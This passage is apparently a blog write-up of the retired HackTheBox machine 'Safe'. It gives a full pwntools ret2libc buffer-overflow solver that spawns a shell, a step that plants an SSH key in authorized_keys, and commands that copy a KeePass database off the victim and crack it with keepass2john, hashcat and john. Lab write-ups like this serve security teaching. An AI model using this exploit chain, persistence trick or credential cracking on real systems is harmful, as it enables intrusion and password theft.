1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Exploiting BOF to Get a Shell</h3>\n<p>I identify the PLT of the <code class=\"language-text\">system</code> function needed to get a shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ objdump -d -M intel -j .plt myapp\n0000000000401040 <span class=\"token operator\">&lt;</span>system@plt<span class=\"token operator\">></span>:\n  <span class=\"token number\">401040</span>:       ff <span class=\"token number\">25</span> da 2f 00 00       jmp    QWORD PTR <span class=\"token punctuation\">[</span>rip+0x2fda<span class=\"token punctuation\">]</span>        <span class=\"token comment\"># 404020 &lt;system@GLIBC_2.2.5></span>\n  <span class=\"token number\">401046</span>:       <span class=\"token number\">68</span> 01 00 00 00          push   0x1\n  40104b:       e9 d0 ff ff ff          jmp    <span class=\"token number\">401020</span> <span class=\"token operator\">&lt;</span>.plt<span class=\"token operator\">></span></code></pre></div>\n<p>Looking in gdb gives the same address.</p>\n<p>PIE appears to be disabled so this address is fixed.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ info functions\nNon-debugging symbols:\n0x0000000000401040  system@plt\n\n$ checksec\nCANARY    <span class=\"token builtin class-name\">:</span> disabled\nFORTIFY   <span class=\"token builtin class-name\">:</span> disabled\nNX        <span class=\"token builtin class-name\">:</span> ENABLED\nPIE       <span class=\"token builtin class-name\">:</span> disabled\nRELRO     <span class=\"token builtin class-name\">:</span> Partial</code></pre></div>\n<p>For a simple BOF, the final goal is roughly this:</p>\n<ol>\n<li>Find a <code class=\"language-text\">pop rdi; ret</code> gadget</li>\n<li>Use BOF to put “/bin/sh” into the stack area after rip</li>\n<li>Put the system address in the next stack area</li>\n</ol>\n<p>Let’s get started.</p>\n<p>Since the difference between the address where the input is stored and RBP is 112 bytes, feeding 120 characters overflows rip and beyond.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token assign-left variable\">p</span><span class=\"token operator\">=</span><span class=\"token variable\"><span class=\"token variable\">$(</span><span class=\"token function\">ps</span> -ef <span class=\"token operator\">|</span> <span class=\"token function\">grep</span> -v <span class=\"token function\">grep</span> <span class=\"token operator\">|</span> <span class=\"token function\">grep</span> myapp <span class=\"token operator\">|</span> <span class=\"token function\">awk</span> <span class=\"token string\">'{print $2}'</span><span class=\"token variable\">)</span></span><span class=\"token punctuation\">;</span> gdb -p <span class=\"token variable\">$p</span> -x gdbcmd.txt\nRDI: 0x7ffc120a2160 --<span class=\"token operator\">></span> 0x74736574 <span class=\"token punctuation\">(</span><span class=\"token string\">'test'</span><span class=\"token punctuation\">)</span>\nRBP: 0x7ffc120a21d0 --<span class=\"token operator\">></span> 0x0 </code></pre></div>\n<p>Using peda’s ropgadget, I found that <code class=\"language-text\">pop rdi; ret</code> exists at 0x401139.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ ROPgadget --binary myapp <span class=\"token operator\">|</span> <span class=\"token function\">grep</span> pop\n0x000000000040120b <span class=\"token builtin class-name\">:</span> pop rdi <span class=\"token punctuation\">;</span> ret\n0x0000000000401209 <span class=\"token builtin class-name\">:</span> pop rsi <span class=\"token punctuation\">;</span> pop r15 <span class=\"token punctuation\">;</span> ret</code></pre></div>\n<p>I got stuck a fair bit after this, but finally obtained the flag with the following steps:</p>\n<ol>\n<li>Use ret2libc to leak the address of <code class=\"language-text\">puts</code></li>\n<li>Use <a href=\"https://libc.blukat.me/?q=puts%3Af90&#x26;l=libc6_2.24-11%2Bdeb9u4_amd64\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">libc database search</a> to identify the libc version</li>\n</ol>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e3525e600b2e2b192b71cc2f8f78d87a/95e27/image-20220714225205008.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 52.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABVUlEQVQoz5VS207DMAzN//8QX8Ebgmdgm9ptbdM099vBTrfRTQhBpKM4tuMcH0doveB47LHb7dB1HdlHdH2PUgr+sjhPThJycQipQKSc4ZxDTBExrkgpIZM/xASfMp1z88UQUKkAFykUzxtwDu8iUaHsA3Kkwt7Be9/AjyzaYOpP5PfNPg0TlLaYFwNjv3OvYDJCu4yXwztkGIG6tsBgRszGvb2CA4uLOIwG+0ETDGygeH3onxxiVAlPb8/Y64+bJpUCN7S8Cmst1DxjJkg5tfOWnSLWjjoV9w/U274FL9ZHTtSyUmCZxmFomvJQB7LTRWvBF0otd8V+ekSHjP1kcNYBI8n0eZbolW3oZovBrgMUj0we2V39kZIXQ4OgyYdcMM0KxgUCDczY5ssE8dsf2xZkbR3pxm3yUlI229PPMFqv+eUfBZmh9bFpyT7eC8t1+RX1Yn8Bqe0PYFAxHLwAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e3525e600b2e2b192b71cc2f8f78d87a/8ac56/image-20220714225205008.webp 240w,\n/static/e3525e600b2e2b192b71cc2f8f78d87a/d3be9/image-20220714225205008.webp 480w,\n/static/e3525e600b2e2b192b71cc2f8f78d87a/e46b2/image-20220714225205008.webp 960w,\n/static/e3525e600b2e2b192b71cc2f8f78d87a/7a7d4/image-20220714225205008.webp 1199w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e3525e600b2e2b192b71cc2f8f78d87a/8ff5a/image-20220714225205008.png 240w,\n/static/e3525e600b2e2b192b71cc2f8f78d87a/e85cb/image-20220714225205008.png 480w,\n/static/e3525e600b2e2b192b71cc2f8f78d87a/d9199/image-20220714225205008.png 960w,\n/static/e3525e600b2e2b192b71cc2f8f78d87a/95e27/image-20220714225205008.png 1199w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e3525e600b2e2b192b71cc2f8f78d87a/d9199/image-20220714225205008.png\"\n            alt=\"image-20220714225205008\"\n            title=\"image-20220714225205008\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<ol start=\"3\">\n<li>Find the address of <code class=\"language-text\">/bin/sh</code> using the relative offset, and execute the system function via ROP</li>\n</ol>\n<p>The solver I used is below:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Local</span>\np <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span><span class=\"token string\">\"./myapp\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Remote</span>\np <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"10.10.10.147\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1337</span><span class=\"token punctuation\">)</span>\n\nelf <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">\"./myapp\"</span><span class=\"token punctuation\">)</span>\nlibc <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">\"/lib/x86_64-linux-gnu/libc.so.6\"</span><span class=\"token punctuation\">)</span>\ncontext<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> elf\n\njunk <span class=\"token operator\">=</span> <span class=\"token string\">b\"\\x41\"</span><span class=\"token operator\">*</span><span class=\"token number\">120</span>\nmain <span class=\"token operator\">=</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x40115f</span><span class=\"token punctuation\">)</span>\nsystem <span class=\"token operator\">=</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x401040</span><span class=\"token punctuation\">)</span>\n\npop_rdi <span class=\"token operator\">=</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x40120b</span><span class=\"token punctuation\">)</span>\npop_rsi_r15 <span class=\"token operator\">=</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x401209</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"\"</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\"\\x41\"</span><span class=\"token operator\">*</span><span class=\"token number\">120</span>\npayload <span class=\"token operator\">+=</span> pop_rdi\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>elf<span class=\"token punctuation\">.</span>got<span class=\"token punctuation\">[</span><span class=\"token string\">\"puts\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>elf<span class=\"token punctuation\">.</span>plt<span class=\"token punctuation\">[</span><span class=\"token string\">\"system\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>elf<span class=\"token punctuation\">.</span>sym<span class=\"token punctuation\">[</span><span class=\"token string\">\"main\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># a = p.recvline().rstrip()</span>\n<span class=\"token comment\"># print(a)</span>\n<span class=\"token comment\"># print(a[7:-11])</span>\n\nleak <span class=\"token operator\">=</span> u64<span class=\"token punctuation\">(</span>p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>rstrip<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">7</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">11</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>ljust<span class=\"token punctuation\">(</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b\"\\x00\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>leak<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>leak<span class=\"token punctuation\">)</span>\n\nbase <span class=\"token operator\">=</span> leak <span class=\"token operator\">-</span> <span class=\"token number\">0x068f90</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>base<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"\"</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\"\\x41\"</span><span class=\"token operator\">*</span><span class=\"token number\">120</span>\npayload <span class=\"token operator\">+=</span> pop_rdi\n<span class=\"token comment\"># payload += p64(next(libc.search(b\"/bin/sh\\x00\")))</span>\n<span class=\"token comment\"># payload += p64(libc.sym[\"system\"])</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>base<span class=\"token operator\">+</span><span class=\"token number\">0x161c19</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>elf<span class=\"token punctuation\">.</span>plt<span class=\"token punctuation\">[</span><span class=\"token string\">\"system\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This gave me the user flag.</p>\n<h2 id=\"internal-enumeration\" style=\"position:relative;\"><a href=\"#internal-enumeration\" aria-label=\"internal enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Internal Enumeration</h2>\n<p>Looking at the home directory, there was a file called <code class=\"language-text\">MyPasswords.kdbx</code> that immediately caught my attention.</p>\n<p>I attempted to transfer the file for analysis.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">ls</span>\nmyapp\nMyPasswords.kdbx\nuser.txt</code></pre></div>\n<p>However, the victim machine had no curl, ftp, or Python available.</p>\n<p>So I used ssh and scp instead.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"&lt;pub key>\"</span> <span class=\"token operator\">></span> ~/.ssh/authorized_keys\n\n$ <span class=\"token function\">scp</span> user@<span class=\"token variable\">$RHOST</span>:/home/user/MyPasswords.kdbx ./</code></pre></div>\n<p>This allowed me to retrieve <code class=\"language-text\">MyPasswords.kdbx</code>.</p>\n<p>I also sent <code class=\"language-text\">linpeas.sh</code> for further enumeration.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">scp</span> /home/kali/Hacking/Tools/linpeas.sh user@<span class=\"token variable\">$RHOST</span>:/home/user</code></pre></div>\n<p>I confirmed that the file type of <code class=\"language-text\">MyPasswords.kdbx</code> is “Keepass password database 2.x KDBX.”</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">file</span> MyPasswords.kdbx \nMyPasswords.kdbx: Keepass password database <span class=\"token number\">2</span>.x KDBX</code></pre></div>\n<p>Reading this article, it seems tools like hashcat and Keepass2john can crack KDBX files:</p>\n<p>Reference: <a href=\"https://davistechmedia.com/can-you-crack-a-keepass-database-if-you-forgot-your-password/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Can You Crack a KeePass Database if You Forgot Your Password? - Davis Tech Media</a></p>\n<p>I tried cracking with the following command, but it took a terribly long time.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ keepass2john MyPasswords.kdbx <span class=\"token operator\">></span> dbhash.txt\n<span class=\"token comment\"># DBNAME:$keepass$....</span>\n$ <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^.*://g'</span> dbhash.txt <span class=\"token comment\"># Remove DBNAME</span>\n\n$ hashcat -a <span class=\"token number\">0</span> -m <span class=\"token number\">13400</span> dbhash.txt /usr/share/wordlists/rockyou.txt</code></pre></div>\n<p>It took about 12 hours in the end, but there was no matching password in the rockyou wordlist.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ john --wordlist<span class=\"token operator\">=</span>/usr/share/wordlists/rockyou.txt dbhash.txt\n$ hashcat -m <span class=\"token number\">13400</span> dbhash.txt -a <span class=\"token number\">3</span> -1 ?l?d ?1?1?1?1?1?1?1?1?1?1 --increment</code></pre></div>\n<p>After more research, it turned out that this approach alone wouldn’t work.</p>\n<p>Trying KeePassXC to open the KDBX, I found that a KeyFile was also required.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 814px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e82f63b6914d682cfebe166aa6f63ddd/a4262/image-20220722231645914.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 55.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABVUlEQVQoz42S23aCMBBF+RBFroGQgICAKFKXl2pXax/a5/7/b5xOolIvxfZhrxNIZtacmTFkXiMSOTjPEIYpaQrGYjqPkedzFEUDIQskSanvLSuEbfMbQjheAiucw2jbLZbLF7TtDk2zxWr9ho/PL/1vvTlQkoySqKAIjiPgurIXxw5guK6gh1GH60ldrUfq+7Gu4PL+vjrevbFVQtP0MRxeMxh43dk0WYey2w8nGIzFYoPn3QH7/TvUWYiJ7lccFyctIeWEKHQVfT1UallUoaCBZNmMqLWm6VSfj6q+a4zHFTF9kJD/JFRWzhbNE8MbPaMCHtoekWWfJShpNbgo4fAKXjSFG1W/w2+hmLA4xhE+kzDUbqneMbVjLIUdZP/GiQr4cQ2ZNlisXqmoDIayYZrB33YuoSGMRgF4PEP9dNBa1ctjhVdNtnhvw+/o4mhQeiChXptv1ZpD6/RPEoQAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e82f63b6914d682cfebe166aa6f63ddd/8ac56/image-20220722231645914.webp 240w,\n/static/e82f63b6914d682cfebe166aa6f63ddd/d3be9/image-20220722231645914.webp 480w,\n/static/e82f63b6914d682cfebe166aa6f63ddd/f23e7/image-20220722231645914.webp 814w\"\n              sizes=\"(max-width: 814px) 100vw, 814px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e82f63b6914d682cfebe166aa6f63ddd/8ff5a/image-20220722231645914.png 240w,\n/static/e82f63b6914d682cfebe166aa6f63ddd/e85cb/image-20220722231645914.png 480w,\n/static/e82f63b6914d682cfebe166aa6f63ddd/a4262/image-20220722231645914.png 814w\"\n            sizes=\"(max-width: 814px) 100vw, 814px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e82f63b6914d682cfebe166aa6f63ddd/a4262/image-20220722231645914.png\"\n            alt=\"image-20220722231645914\"\n            title=\"image-20220722231645914\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I wasn’t familiar with this, but the KeePass documentation explains that there are two ways to create a KDBX: with password only, or with a combination of password and a key file.</p>\n<p>Setting a key file implements two-factor authentication for opening the KDBX, combining both password and key file.</p>\n<p>Reference: <a href=\"https://keepass.info/help/base/keys.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Master Key - KeePass</a></p>\n<p>So I assumed the suggestively placed image files were the key files and tried cracking the hash.</p>\n<p>To use a key file with keepass2john, the following approach works:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">scp</span> user@<span class=\"token variable\">$RHOST</span>:/home/user/IMG* ./\n\n<span class=\"token comment\"># Use keepass2john with key file</span>\n$ keepass2john MyPasswords.kdbx <span class=\"token operator\">></span> dbhash.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token function\">ls</span> <span class=\"token operator\">|</span> <span class=\"token function\">grep</span> .JPG <span class=\"token operator\">|</span> <span class=\"token keyword\">while</span> <span class=\"token builtin class-name\">read</span> f<span class=\"token punctuation\">;</span> <span class=\"token keyword\">do</span> keepass2john -k <span class=\"token variable\">$f</span> MyPasswords.kdbx <span class=\"token operator\">>></span> dbhash.txt <span class=\"token punctuation\">;</span> <span class=\"token keyword\">done</span></code></pre></div>\n<p>Reference: <a href=\"https://stackoverflow.com/questions/45788336/produce-a-hash-from-keepass-with-keyfile\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">hashcat - Produce a Hash from Keepass with Keyfile - Stack Overflow</a></p>\n<p>I then used john to crack the generated hashes.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ john dbhash.txt /usr/share/wordlists/rockyou.txt</code></pre></div>\n<p>Combining the discovered password with the right IMG file gave me the root password.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/799241d4a513dbbbee673b4cd5aad48f/bb051/image-20220723003851638.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 53.333333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABu0lEQVQoz32S25KbMBBE+ZEsYFgDEgYJg7nZ5n7z6z5s5XPy5Z0ROC7bleSha0ZUcdQ9I22ZJwx9i3Ea0HUNprFH3baQSYkwPCEIEgiRkhJImcHzBPZOAMtisG2O3c5bpesOHIdDu90GgjQYx3YDEvhyviCOMsRxiSg6o2kWFHkJ309gGgrAX2Tdq+v60JZ5wDCQQ3LWtgrY4Vr3yL9+Ia6+kcQZikuPU17D40d8mAyGxWHa/ot0At4dzliWCTNF3xz2uFYNzvNPiKQhYIFjWiM4lmAiA5c53EMCfR/AeJK5D+F6B2jT0JGzGrd5xDxufZYXSMsaoUzBWAQepohOFwgagQKrs24fYHxu0smhS+4ZC6B1FLOqrlC1aaoVmJxS/PgMwILTuhjbk7BoGY4fb7DdFvtda2QhJSKSqkJQH0lwP6BIIRwmadACJmmnoOTWJieGE77IJKkROGopQgg8SxKYcYpCEHWreg5r78p7pQsI/i71/QFUELk6FKtbzoPtR7VB0/s35H/APw4fQIcgajaG+3D2LvOp/6DI+78B5QqkyPTelDtTAZXLN5m0GDUO71AgTDr4tCzGQ/wGy/BVovwNM2AAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/799241d4a513dbbbee673b4cd5aad48f/8ac56/image-20220723003851638.webp 240w,\n/static/799241d4a513dbbbee673b4cd5aad48f/d3be9/image-20220723003851638.webp 480w,\n/static/799241d4a513dbbbee673b4cd5aad48f/e46b2/image-20220723003851638.webp 960w,\n/static/799241d4a513dbbbee673b4cd5aad48f/0dc00/image-20220723003851638.webp 1212w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/799241d4a513dbbbee673b4cd5aad48f/8ff5a/image-20220723003851638.png 240w,\n/static/799241d4a513dbbbee673b4cd5aad48f/e85cb/image-20220723003851638.png 480w,\n/static/799241d4a513dbbbee673b4cd5aad48f/d9199/image-20220723003851638.png 960w,\n/static/799241d4a513dbbbee673b4cd5aad48f/bb051/image-20220723003851638.png 1212w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/799241d4a513dbbbee673b4cd5aad48f/d9199/image-20220723003851638.png\"\n            alt=\"image-20220723003851638\"\n            title=\"image-20220723003851638\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This gave me the root flag.</p>\n<p>Exhausting…</p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>This was a BOF challenge.</p>","fields":{"slug":"/hackthebox-linux-safe-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-06-12","description":"A writeup of the retired HackTheBox machine 'Safe'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Safe (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-safe-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}